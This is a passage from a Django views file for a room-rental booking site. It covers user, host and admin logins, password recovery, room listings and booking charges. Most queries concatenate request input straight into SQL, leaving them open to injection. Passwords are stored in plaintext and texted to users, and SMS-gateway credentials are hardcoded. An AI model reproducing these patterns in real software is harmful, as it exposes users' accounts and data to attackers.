conn=connect(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n    s=\"select * from user where email='\"+request.POST[\"email\"]+\"' and mobile=\"+request.POST[\"mobile\"]+\"\"\r\n    cr=conn.cursor()\r\n    cr.execute(s)\r\n    result=cr.fetchone()\r\n    if result:\r\n        password = result[2]\r\n        conn = http.client.HTTPConnection(\"server1.vmm.education\")\r\n        conn.request('GET',\r\n                     '/VMMCloudMessaging/AWS_SMS_Sender?username=ayushidhir&password=6TLLQSSZ&message=' + password + '&phone_numbers='\r\n                     + str(request.POST[\"mobile\"]))\r\n        response = conn.getresponse()\r\n        print(response.read())\r\n        return HttpResponseRedirect(\"userlogin\")\r\n    else:\r\n        d={\"message\":\"Invalid Mobile Number\"}\r\n        return render(request,\"userlogin.html\",{\"ar\":d})\r\n\r\n\r\n@csrf_exempt\r\ndef forgotadmin(request):\r\n    conn=connect(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n    s=\"select * from admin where mobile=\"+request.POST[\"mobile\"]+\"\"\r\n    cr=conn.cursor()\r\n    cr.execute(s)\r\n    result=cr.fetchone()\r\n    if result:\r\n        password = result[1]  # admin schema is (email, password, type, mobile); result[2] was the type, not the password\r\n        conn = http.client.HTTPConnection(\"server1.vmm.education\")\r\n        conn.request('GET',\r\n                     '/VMMCloudMessaging/AWS_SMS_Sender?username=ayushidhir&password=6TLLQSSZ&message=' + password + '&phone_numbers='\r\n                     + str(request.POST[\"mobile\"]))\r\n        response = conn.getresponse()\r\n        print(response.read())\r\n        # return HttpResponseRedirect(\"adminlogin\")\r\n        return HttpResponse(\"success\")\r\n    else:\r\n        # d={\"message\":\"Invalid Mobile Number\"}\r\n        # return render(request,\"adminlogin.html\",{\"ar\":d})\r\n        return HttpResponse(\"fail\")\r\n\r\n@csrf_exempt\r\ndef addcategory(request):\r\n    if \"adminemail\" in request.session:\r\n        return render(request,\"addcategory.html\")\r\n    else:\r\n        return HttpResponseRedirect(\"adminlogin\")\r\n\r\n@csrf_exempt\r\ndef insercategory(request):\r\n    conn=Connection(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n    q=\"select * from category where cname='\"+request.POST[\"cname\"]+\"'\"\r\n    cr=conn.cursor()\r\n    cr.execute(q)\r\n    result=cr.fetchone()\r\n    if result:\r\n        d={\"message\":\"Category already exists\"}\r\n        return render(request,\"addcategory.html\",{\"ar\":d})\r\n    else:\r\n        file = request.FILES[\"photo\"]\r\n        uploadname = \"categoryphotos/\" + str(random.randint(1, 10000)) + file.name\r\n        s=\"insert into category values('\"+ request.POST[\"cname\"]+\"','\"+request.POST[\"description\"]+\"','\"+uploadname+\"')\"\r\n        fs = FileSystemStorage()\r\n        fs.save(uploadname, file)\r\n        cr=conn.cursor()\r\n        cr.execute(s)\r\n        conn.commit()\r\n        d={\"message\":\"category added successfully\"}\r\n        return render(request,\"addcategory.html\",{\"ar\":d})\r\n\r\ndef showcategory(request):\r\n    if \"adminemail\" in request.session:\r\n        conn=Connection(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n        s=\"select * from category\"\r\n        cr=conn.cursor()\r\n        cr.execute(s)\r\n        result=cr.fetchall()\r\n        x=[]\r\n        for row in result:\r\n            d={}\r\n            d[\"cname\"]=row[0]\r\n            d[\"description\"]=row[1]\r\n            d[\"photo\"]=row[2]\r\n            x.append(d)\r\n        return render(request,\"showcategory.html\",{\"ar\":x})\r\n    else:\r\n        return HttpResponseRedirect(\"adminlogin\")\r\n\r\ndef removecategory(request):\r\n    conn=connect(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n    s=\"delete from category where cname='\"+request.GET[\"q\"]+\"'\"\r\n    print(s)\r\n    cr=conn.cursor()\r\n    cr.execute(s)\r\n    conn.commit()\r\n    return HttpResponseRedirect(\"showcategory\")\r\n
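# --- Editor's aside: the views in this file interpolate request data into SQL strings; a hedged\r\n# sketch of the parameterized equivalent for removecategory above (pymysql uses %s placeholders):\r\n#   def removecategory(request):\r\n#       conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n#       cr = conn.cursor()\r\n#       cr.execute(\"delete from category where cname=%s\", (request.GET[\"q\"],))\r\n#       conn.commit()\r\n#       return HttpResponseRedirect(\"showcategory\")\r\n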
HttpResponseRedirect(\"showcategory\")\r\n\r\n@csrf_exempt\r\ndef editcategory(request):\r\n conn=connect(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n s=\"select * from category where cname='\"+request.GET[\"q\"]+\"'\"\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n result=cr.fetchone()\r\n #return HttpResponse(result)\r\n d={\"cname\":result[0],\"description\":result[1],\"photo\":result[2]}\r\n return render(request,\"editcategory.html\",{\"ar\":d})\r\n\r\n@csrf_exempt\r\ndef savecategory(request):\r\n file=request.FILES[\"photo\"]\r\n uploadname=\"categoryphotos/\"+str(random.randint(1,1000))+file.name\r\n conn=connect(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n s=\"update category set description='\"+request.POST[\"description\"]+\"',photo='\"+uploadname+\"'where cname='\"+request.POST[\"cname\"]+\"'\"\r\n fs=FileSystemStorage()\r\n fs.save(uploadname,file)\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n conn.commit()\r\n return HttpResponseRedirect(\"showcategory\")\r\n\r\n\r\n@csrf_exempt\r\ndef hostsignup(request):\r\n return render(request,\"host_signup.html\")\r\n\r\n@csrf_exempt\r\ndef inserthost(request):\r\n conn=connect(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n s=\"select * from host where email='\"+request.POST[\"email\"]+\"' and mobile=\"+request.POST[\"mobile\"]+\"\"\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n result=cr.fetchone()\r\n if result:\r\n return HttpResponse(\"fail\")\r\n else:\r\n file = request.FILES[\"photo\"]\r\n uploadname = \"hostphotos/\" + str(random.randint(1, 1000)) + file.name\r\n q=\"insert into host values(NULL,'\"+request.POST[\"name\"]+\"','\"+request.POST[\"email\"]+\"','\"+request.POST[\"password\"]+\"','\"+request.POST[\"city\"]+\"',\"+request.POST[\"mobile\"]+\",'\"+uploadname+\"','\"+request.POST[\"description\"]+\"','\"+request.POST[\"location\"]+\"','pending')\"\r\n fs=FileSystemStorage()\r\n fs.save(uploadname,file)\r\n cr=conn.cursor()\r\n cr.execute(q)\r\n conn.commit()\r\n return HttpResponse(\"success\")\r\n\r\n\r\n\r\ndef index(request):\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s = \"select city from host\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n result = cr.fetchall()\r\n x= []\r\n id=[]\r\n for row in result:\r\n d={}\r\n if not x:\r\n id.append((row[0]))\r\n d['city']=row[0]\r\n x.append(d)\r\n elif row[0] in id:\r\n pass\r\n else:\r\n id.append(row[0])\r\n d['city']=row[0]\r\n x.append(d)\r\n print(x)\r\n\r\n s = \"select cname from category\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n result = cr.fetchall()\r\n\r\n catname = []\r\n for row in result:\r\n d = {\"category\": row[0]}\r\n catname.append(d)\r\n return render(request,\"index.html\",{'city':x,'catname':catname})\r\n\r\ndef login(request):\r\n return render(request,\"login.html\")\r\n\r\ndef register(request):\r\n return render(request,\"register.html\")\r\n\r\ndef contact(request):\r\n return render(request,'contactus.html')\r\n\r\ndef userlogout(request):\r\n try:\r\n del request.session['useremail']\r\n except:\r\n pass\r\n return HttpResponseRedirect('/')\r\n\r\ndef hostlogout(request):\r\n try:\r\n del request.session['hostemail']\r\n except:\r\n pass\r\n return HttpResponseRedirect('/')\r\n\r\n\r\n@csrf_exempt\r\ndef hostlogin(request):\r\n return render(request,\"hostlogin.html\")\r\n\r\n@csrf_exempt\r\ndef hostlogin1(request):\r\n # print(request.POST['email'],request.POST['password'])\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s = \"select * from host where email='\" + request.POST[\"email\"] + 
\"'and password='\" + request.POST[\"password\"] + \"' and status='active'\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n result = cr.fetchone()\r\n # print(list(result))\r\n if result:\r\n # d = {\"name\": result[3]}\r\n request.session['hostemail'] = request.POST[\"email\"]\r\n request.session['hostid']=result[0]\r\n # return render(request, \"userdashboard.html\",{\"ar\":d})\r\n return HttpResponse(\"success\")\r\n\r\n else:\r\n # d = {\"message\": \"Invalid email/password\"}\r\n # return render(request, \"userlogin.html\",{\"ar\": d})\r\n return HttpResponse(\"fail\")\r\n\r\n@csrf_exempt\r\ndef addrooms(request):\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s = \"select cname from category\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n result = cr.fetchall()\r\n x = []\r\n for row in result:\r\n d = {\"cname\": row[0]}\r\n x.append(d)\r\n return render(request,\"addrooms.html\",{\"ar\":x})\r\n\r\n@csrf_exempt\r\ndef addrooms1(request):\r\n conn = Connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n q=\"select * from host where email ='\"+request.session['hostemail']+\"'\"\r\n cr=conn.cursor()\r\n cr.execute(q)\r\n result=cr.fetchone()\r\n print(result[0])\r\n hid = result[0]\r\n file = request.FILES[\"coverphoto\"]\r\n uploadname = \"spacephotos/\" + str(random.randint(1, 10000)) + file.name\r\n s = \"insert into rooms values(NULL,'\"+request.POST[\"roomname\"]+\"','\"+request.POST[\"area\"]+\"','\"+request.POST[\"description\"]+\"','\"+uploadname+\"',\"+str(hid)+\",'\"+request.POST[\"tariffsingle\"]+\"','\"+request.POST[\"tariffdouble\"]+\"','\"+request.POST[\"extraperson\"]+\"','\"+request.POST[\"rating\"]+\"','\"+request.POST[\"count\"]+\"','\"+request.POST[\"category\"]+\"')\"\r\n fs = FileSystemStorage()\r\n fs.save(uploadname, file)\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n conn.commit()\r\n return HttpResponse(\"success\")\r\n\r\n\r\ndef viewrooms(request):\r\n conn = Connection(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s = \"select * from rooms where hid=\"+str(request.session['hostid'])+\"\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n result = cr.fetchall()\r\n x = []\r\n for row in result:\r\n d = {\"roomid\":row[0],\"roomname\":row[1],\"area\":row[2],\"description\":row[3],\"coverphoto\":row[4],\"hid\":row[5],\"tariffsingle\":row[6],\"tariffdouble\":row[7],\"extraperson\":row[8],\"rating\":row[9],\"count\":row[10],\"category\":row[11]}\r\n x.append(d)\r\n return render(request, \"viewrooms.html\", {\"ar\": x})\r\n\r\ndef removerooms(request):\r\n conn=connect(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n s=\"delete from rooms where roomid=\"+request.GET[\"q\"]+\"\"\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n conn.commit()\r\n return HttpResponseRedirect(\"viewrooms\")\r\n\r\ndef editrooms(request):\r\n conn=connect(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n print(request.GET[\"q\"])\r\n s=\"select * from rooms where roomid='\"+request.GET[\"q\"]+\"'\"\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n result=cr.fetchone()\r\n d={\"roomid\":result[0],\"roomname\":result[1],\"area\":result[2],\"description\":result[3],\"coverphoto\":result[4],\"tariffsingle\":result[6],\"tariffdouble\":result[7],\"extraperson\":result[8]}\r\n return JsonResponse(d,safe=False)\r\n\r\n@csrf_exempt\r\ndef saverooms(request):\r\n file = request.FILES[\"coverphoto\"]\r\n uploadname = \"spacephotos/\" + str(random.randint(1, 10000)) + file.name\r\n conn = connect(\"127.0.0.1\", \"root\", \"system\", \"sparespace\")\r\n s = \"update rooms set roomname='\" + 
request.POST[\"roomname\"] + \"',area='\" + request.POST[\r\n \"area\"] + \"',description='\"+request.POST[\"description\"]+\"',coverphoto='\"+uploadname+\"',tariffsingle='\"+request.POST[\"tariffsingle\"]+\"',tariffdouble='\"+request.POST[\"tariffdouble\"]+\"',extraperson='\"+request.POST[\"extraperson\"]+\"' where roomid='\" + request.POST[\"roomid\"] + \"'\"\r\n fs = FileSystemStorage()\r\n fs.save(uploadname, file)\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n conn.commit()\r\n return HttpResponse(\"success\")\r\n\r\ndef insertphotos(request):\r\n roomid=request.GET['q']\r\n # description=request.GET['q1']\r\n conn=connect(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n s=\"select * from photos where roomid='\"+roomid+\"'\"\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n result=cr.fetchall()\r\n x=[]\r\n for row in result:\r\n d={\"pid\":row[0],\"photo\":row[1],\"description\":row[2]}\r\n x.append(d)\r\n return render(request,\"addroomphotos.html\",{\"ar\":roomid,\"ar1\":x})\r\n\r\n@csrf_exempt\r\ndef addroomphotos(request):\r\n file = request.FILES[\"photo\"]\r\n uploadname = \"addspacephotos/\" + str(random.randint(1, 10000)) + file.name\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s=\"insert into photos values(NULL,'\"+uploadname+\"','\"+request.POST['description']+\"',\"+request.POST['roomid']+\")\"\r\n fs=FileSystemStorage()\r\n fs.save(uploadname,file)\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n conn.commit()\r\n return HttpResponse(\"success\")\r\n\r\ndef deleteroomphoto(request):\r\n pid=request.GET['id']\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s=\"delete from photos where pid='\"+pid+\"'\"\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n conn.commit()\r\n return HttpResponseRedirect(\"viewrooms\")\r\n\r\ndef viewroomdetails(request):\r\n roomid=request.GET[\"q\"]\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n q=\"select * from photos where roomid='\"+roomid+\"'\"\r\n cr=conn.cursor()\r\n cr.execute(q)\r\n result=cr.fetchall()\r\n x=[]\r\n for row in result:\r\n d1={\"photo\":row[1]}\r\n x.append(d1)\r\n s=\"select * from rooms where roomid='\"+roomid+\"'\"\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n row=cr.fetchone()\r\n\r\n d = {\"roomid\": row[0], \"roomname\": row[1], \"area\": row[2], \"description\": row[3], \"coverphoto\": row[4],\r\n \"hid\": row[5], \"tariffsingle\": row[6], \"tariffdouble\": row[7], \"extraperson\": row[8], \"rating\": row[9],\r\n \"count\": row[10], \"category\": row[11]}\r\n return render(request,\"roomdetails.html\",{\"ar\":d,\"ar1\":x})\r\n\r\n\r\n\r\n# def findproperty(request):\r\n# conn=connect(\"127.0.0.1\",\"root\",\"system\",\"sparespace\")\r\n# s=\"select cname from category\"\r\n# cr=conn.cursor()\r\n# cr.execute(s)\r\n# result=cr.fetchall()\r\n#\r\n# x = []\r\n# for row in result:\r\n# d={\"category\":row[0]}\r\n# x.append(d)\r\n# return render(request, \"findpropertyresult.html\", {\"ar\":x})\r\n\r\n@csrf_exempt\r\ndef findpropertyresult(request):\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n city=request.POST[\"city\"]\r\n category=request.POST[\"category\"]\r\n # s=\"select * from host inner join rooms on host.hid=rooms.hid\"\r\n s=f\"select * from host inner join rooms on host.hid=rooms.hid where city='{city}' and category='{category}'\"\r\n print(s)\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n result=cr.fetchall()\r\n print(result)\r\n x=[]\r\n for row in result:\r\n 
d={\"hid\":row[0],\"city\":row[4],\"roomid\":row[10],\"coverphoto\":row[14],\"roomname\":row[11],\"area\":row[12],\"hostname\":row[1],\"category\":row[21]}\r\n x.append(d)\r\n print(x)\r\n return render(request, \"findpropertyresult.html\", {\"ar\":x})\r\n\r\ndef viewdetailproperty(request):\r\n hid=request.GET['hid']\r\n roomid=request.GET['roomid']\r\n category=request.GET['category']\r\n city=request.GET['city']\r\n s = f\"select * from host inner join rooms on host.hid=rooms.hid where host.hid='{hid}' and rooms.roomid='{roomid}'\"\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n row = cr.fetchone()\r\n tspd=round(row[16]/30,2)\r\n tdpd=round(row[17]/30,2)\r\n texpd=round(row[18]/30,2)\r\n d={\"hid\":row[0],\"hostname\":row[1],\"email\":row[2],\"city\":row[4],\"mobile\":row[5],\"dp\":row[6],\"descriptionhost\":row[7],\"location\":row[8],\"roomid\":row[10],\"roomname\":row[11],\"area\":row[12],\"description\":row[13],\"coverphoto\":row[14],\"tariffsingle\":row[16],\"tariffdouble\":row[17],\"extraperson\":row[18],\"rating\":row[19],\"count\":row[20],\"category\":row[21],\"tariffsingleperday\":tspd,\r\n \"tariffdoubleperday\":tdpd,\"extraperday\":texpd}\r\n\r\n\r\n query=f'select * from photos where roomid={roomid}'\r\n cr = conn.cursor()\r\n cr.execute(query)\r\n result1 = cr.fetchall()\r\n x1=[]\r\n for row in result1:\r\n d1={\"pid\":row[0],\"photo\":row[1],\"description\":row[2],\"roomid\":row[3]}\r\n x1.append(d1)\r\n\r\n q = \"select * from host inner join rooms on host.hid=rooms.hid where host.city='\"+city+\"'and rooms.category='\"+category+\"'\"\r\n cr = conn.cursor()\r\n cr.execute(q)\r\n result = cr.fetchall()\r\n x2 = []\r\n if result:\r\n for row in result:\r\n d2 = {\"city\":row[4],\"roomid\": row[10], \"roomname\": row[11], \"area\": row[12], \"description\": row[13], \"coverphoto\": row[14],\r\n \"hid\": row[15], \"tariffsingle\": row[16], \"tariffdouble\": row[17], \"extraperson\": row[18],\r\n \"rating\": row[19],\r\n \"count\": row[20], \"category\": row[21]}\r\n\r\n x2.append(d2)\r\n return render(request,'viewdetailproperty.html',{\"alldata\":d,\"photos\":x1,\"related\":x2})\r\n\r\ndef findproperty(request):\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s = \"select city from host\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n result = cr.fetchall()\r\n x= []\r\n id=[]\r\n for row in result:\r\n d={}\r\n if not x:\r\n id.append((row[0]))\r\n d['city']=row[0]\r\n x.append(d)\r\n elif row[0] in id:\r\n pass\r\n else:\r\n id.append(row[0])\r\n d['city']=row[0]\r\n x.append(d)\r\n print(x)\r\n\r\n s = \"select cname from category\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n result = cr.fetchall()\r\n\r\n catname = []\r\n for row in result:\r\n d = {\"category\": row[0]}\r\n catname.append(d)\r\n print(x,catname)\r\n return render(request,'findproperty.html',{'city':x,'catname':catname})\r\n\r\n\r\n#admin view host\r\ndef viewhost(request):\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s=\"select * from host where status='pending'\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n result = cr.fetchall()\r\n x=[]\r\n for row in result:\r\n d={\"hid\":row[0],\"hostname\":row[1],\"email\":row[2],\"city\":row[4],\"mobile\":row[5],\"photo\":row[6],\"description\":row[7],\"location\":row[8]}\r\n x.append(d)\r\n s = \"select * from host where status='active'\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n result = cr.fetchall()\r\n y = []\r\n for row in result:\r\n d = 
{\"hid\": row[0], \"hostname\": row[1], \"email\": row[2], \"city\": row[4], \"mobile\": row[5], \"photo\": row[6],\r\n \"description\": row[7], \"location\": row[8]}\r\n y.append(d)\r\n z=[]\r\n z.append(x)\r\n z.append(y)\r\n\r\n return render(request,\"viewhost.html\",{\"ar\":z})\r\n\r\ndef activehost(request):\r\n hid=request.GET['q']\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s=\"update host set status='active' where hid=\"+hid+\"\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n conn.commit()\r\n return HttpResponseRedirect(\"viewhost\")\r\n\r\n\r\ndef pendinghost(request):\r\n hid = request.GET['q']\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s = \"update host set status='pending' where hid=\" + hid + \"\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n conn.commit()\r\n return HttpResponseRedirect(\"viewhost\")\r\n\r\n#admin view space\r\ndef viewspace(request):\r\n hid=request.GET['q']\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s=\"select * from rooms where hid=\"+hid+\"\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n result=cr.fetchall()\r\n x=[]\r\n for row in result:\r\n d={\"roomid\":row[0],\"roomname\":row[1],\"area\":row[2],\"description\":row[3],\"coverphoto\":row[4],\"hid\":row[5],\"tariffsingle\":row[6],\"tariffdouble\":row[7],\"extraperson\":row[8],\"rating\":row[9],\"count\":row[10],\"category\":row[11]}\r\n x.append(d)\r\n return render(request,\"viewspace.html\",{\"ar\":x})\r\n\r\n#admin view space details\r\ndef viewspacedetails(request):\r\n roomid = request.GET[\"q\"]\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n q = \"select * from photos where roomid='\" + roomid + \"'\"\r\n cr = conn.cursor()\r\n cr.execute(q)\r\n result = cr.fetchall()\r\n x = []\r\n for row in result:\r\n d1 = {\"photo\": row[1]}\r\n x.append(d1)\r\n s = \"select * from rooms where roomid='\" + roomid + \"'\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n row = cr.fetchone()\r\n\r\n d = {\"roomid\": row[0], \"roomname\": row[1], \"area\": row[2], \"description\": row[3], \"coverphoto\": row[4],\r\n \"hid\": row[5], \"tariffsingle\": row[6], \"tariffdouble\": row[7], \"extraperson\": row[8], \"rating\": row[9],\r\n \"count\": row[10], \"category\": row[11]}\r\n return render(request, \"spacedetails.html\", {\"ar\": d, \"ar1\": x})\r\n\r\n\r\n#host view profile\r\ndef viewprofile(request):\r\n conn = Connection(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s = \"select * from host where email='\" +request.session['hostemail'] +\"'\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n result = cr.fetchone()\r\n x = []\r\n d = {\"hid\": result[0], \"hostname\": result[1], \"email\": result[2], \"city\": result[4], \"mobile\": result[5], \"photo\": result[6],\r\n \"description\": result[7], \"location\": result[8]}\r\n x.append(d)\r\n return render(request,\"viewprofile.html\",{\"ar\":x})\r\n\r\n#host edit profile\r\ndef editprofile(request):\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s = \"select * from host where hid='\" + request.GET[\"q\"] + \"'\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n result = cr.fetchone()\r\n d = {\"hid\": result[0], \"hostname\": result[1], \"email\": result[2],\"city\":result[4],\"mobile\":result[5],\"photo\":result[6],\"description\":result[7],\"location\":result[8]}\r\n return JsonResponse(d, safe=False)\r\n\r\n@csrf_exempt\r\ndef savehostprofile(request):\r\n hid=request.POST['hid']\r\n hostname=request.POST['hostname']\r\n email = 
request.POST['email']\r\n city = request.POST['city']\r\n mobile = request.POST['mobile']\r\n description = request.POST['description']\r\n location = request.POST['location']\r\n file = request.FILES[\"photo\"]\r\n uploadname = \"hostphotos/\" + str(random.randint(1, 10000)) + file.name\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s=\"update host set hostname='\"+hostname+\"',email='\"+email+\"',city='\"+city+\"',mobile=\"+mobile+\",dp='\"+uploadname+\"',description='\"+description+\"',location='\"+location+\"' where hid=\"+hid+\"\"\r\n fs = FileSystemStorage()\r\n fs.save(uploadname, file)\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n conn.commit()\r\n return HttpResponse(\"success\")\r\n\r\n@csrf_exempt\r\ndef checkout(request):\r\n checkin = request.POST['checkin']\r\n roomid = request.POST['roomid']\r\n checkout = request.POST['checkout']\r\n person = request.POST['person']\r\n extraperson = request.POST['extraperson']\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s = \"select * from booking where roomid='\"+str(roomid)+\"' and (checkin and checkout between '\"+str(checkin)+\"' and '\"+str(checkout)+\"')\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n result = cr.fetchone()\r\n if result:\r\n return HttpResponse(\"fail\")\r\n else:\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n q = \"select * from rooms where roomid='\"+str(roomid)+\"'\"\r\n print(roomid)\r\n cr=conn.cursor()\r\n cr.execute(q)\r\n result = cr.fetchone()\r\n tariffsingle = result[6]\r\n tariffdouble = result[7]\r\n extra = result[8]\r\n tsperday=tariffsingle/30\r\n print(tsperday)\r\n tdperday=tariffdouble/30\r\n texperday=extra/30\r\n from datetime import date\r\n print(checkout,checkin)\r\n c1=str(checkin).split(\"-\")\r\n c2=str(checkout).split(\"-\")\r\n d0 = date((int)(c1[0]),(int)(c1[1]),(int)(c1[2]))\r\n d1 = date((int)(c2[0]),(int)(c2[1]),(int)(c2[2]))\r\n delta = d1 - d0\r\n print('no of days ',delta)\r\n total=0\r\n nd = str(delta).split(\" \")\r\n totaldays=(int)(nd[0])\r\n if person =='single':\r\n total = ((float)(tsperday) +((int)(extraperson)*(float)(texperday)))*((int)(totaldays))\r\n total=round(total)\r\n elif person=='double':\r\n total = ((float)(tdperday) +((int)(extraperson)*(float)(texperday)))*((int)(totaldays))\r\n total=round(total)\r\n # elif person=='single' and totaldays>=30:\r\n # total=((float)(tariffsingle) +((int)(extraperson)*(float)(extra)))*((int)(totaldays-30))\r\n # elif person=='double' and totaldays>=30:\r\n # total=((float)(tariffdouble) +((int)(extraperson)*(float)(extra)))*((int)(totaldays-30))\r\n d={\"roomid\":roomid,\"person\":person,\"extrap\":extraperson,\"checkin\":checkin,\"checkout\":checkout,\"charges\":total}\r\n return JsonResponse(d,safe=False)\r\n\r\n@csrf_exempt\r\ndef checkout1(request):\r\n checkin = request.POST['checkin']\r\n roomid = request.POST['roomid']\r\n checkout = request.POST['checkout']\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s = \"select * from booking where roomid='\" + str(roomid) + \"' and (checkin and checkout between '\" + str(\r\n checkin) + \"' and '\" + str(checkout) + \"')\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n result = cr.fetchone()\r\n if result:\r\n return JsonResponse(\"fail\")\r\n else:\r\n q = \"select * from rooms where roomid='\" + str(roomid) + \"'\"\r\n cr = conn.cursor()\r\n cr.execute(q)\r\n result = cr.fetchone()\r\n tariffsingle = result[6]\r\n tsperday = tariffsingle / 30\r\n from datetime import date\r\n 
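# NOTE (editor): a sketch, not the author's code -- on Python 3.7+ the string-splitting date math below (also used in checkout above) reduces to:\r\n # d0 = date.fromisoformat(str(checkin))\r\n # d1 = date.fromisoformat(str(checkout))\r\n # totaldays = (d1 - d0).days\r\n 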
print(checkout, checkin)\r\n c1 = str(checkin).split(\"-\")\r\n c2 = str(checkout).split(\"-\")\r\n d0 = date((int)(c1[0]), (int)(c1[1]), (int)(c1[2]))\r\n d1 = date((int)(c2[0]), (int)(c2[1]), (int)(c2[2]))\r\n delta = d1 - d0\r\n print('no of days ', delta)\r\n total = 0\r\n nd = str(delta).split(\" \")\r\n totaldays = (int)(nd[0])\r\n total=total+(float(tsperday))*((int)(totaldays))\r\n total1=round(total)\r\n d = {\"roomid\": roomid, \"person\": \"single\", \"extrap\": \"0\", \"checkin\": checkin, \"checkout\": checkout,\r\n \"charges\": total1}\r\n return JsonResponse(d, safe=False)\r\n\r\ndef proceedtopayment(request):\r\n rid=request.GET['rid']\r\n persons=request.GET['p']\r\n experson=request.GET['ex']\r\n ckin=request.GET['cin']\r\n ckout=request.GET['cout']\r\n total=request.GET['total']\r\n print(total)\r\n hostid=request.GET['hid']\r\n s=str(total).split(\".\")\r\n print(s)\r\n ts=(float)(s[0])*100\r\n d={\"rid\":rid,\"persons\":persons,\"extra\":experson,\"checkin\":ckin,\"checkout\":ckout,\"total\":total,\"ts\":ts,\"hid\":hostid}\r\n conn=connect(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n s=\"select * from rooms where roomid='\"+rid+\"'\"\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n row=cr.fetchone()\r\n d1={\"roomname\":row[1],\"area\":row[2],\"description\":row[3],\"coverphoto\":row[4],\"hid\":row[5]}\r\n # print(d1)\r\n q=\"select * from user where email='\"+request.session['useremail']+\"'\"\r\n cr.execute(q)\r\n row1=cr.fetchone()\r\n d2={\"mobile\":row1[0],\"email\":row1[1],\"name\":row1[3],\"address\":row1[4]}\r\n return render(request,\"proceedtopayment.html\",{\"ar\":d,\"ar1\":d1,\"ar2\":d2})\r\n\r\n\r\ndef proceedtopayment1(request):\r\n rid=request.GET['rid']\r\n ckin=request.GET['cin']\r\n ckout=request.GET['cout']\r\n total=request.GET['total']\r\n hostid = request.GET['hid']\r\n s=str(total).split(\".\")\r\n ts=(float)(s[0])*100\r\n d={\"rid\":rid,\"checkin\":ckin,\"checkout\":ckout,\"total\":total,\"ts\":ts,\"hid\":hostid}\r\n conn=connect(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n s=\"select * from rooms where roomid='\"+rid+\"'\"\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n row=cr.fetchone()\r\n d1={\"roomname\":row[1],\"area\":row[2],\"description\":row[3],\"coverphoto\":row[4],\"hid\":row[5],\"tariffsingle\": row[6], \"tariffdouble\": row[7], \"extraperson\": row[8], \"rating\": row[9],\r\n \"count\": row[10], \"category\": row[11]}\r\n # print(d1)\r\n q = \"select * from user where email='\" + request.session['useremail'] + \"'\"\r\n cr.execute(q)\r\n row1 = cr.fetchone()\r\n d2 = 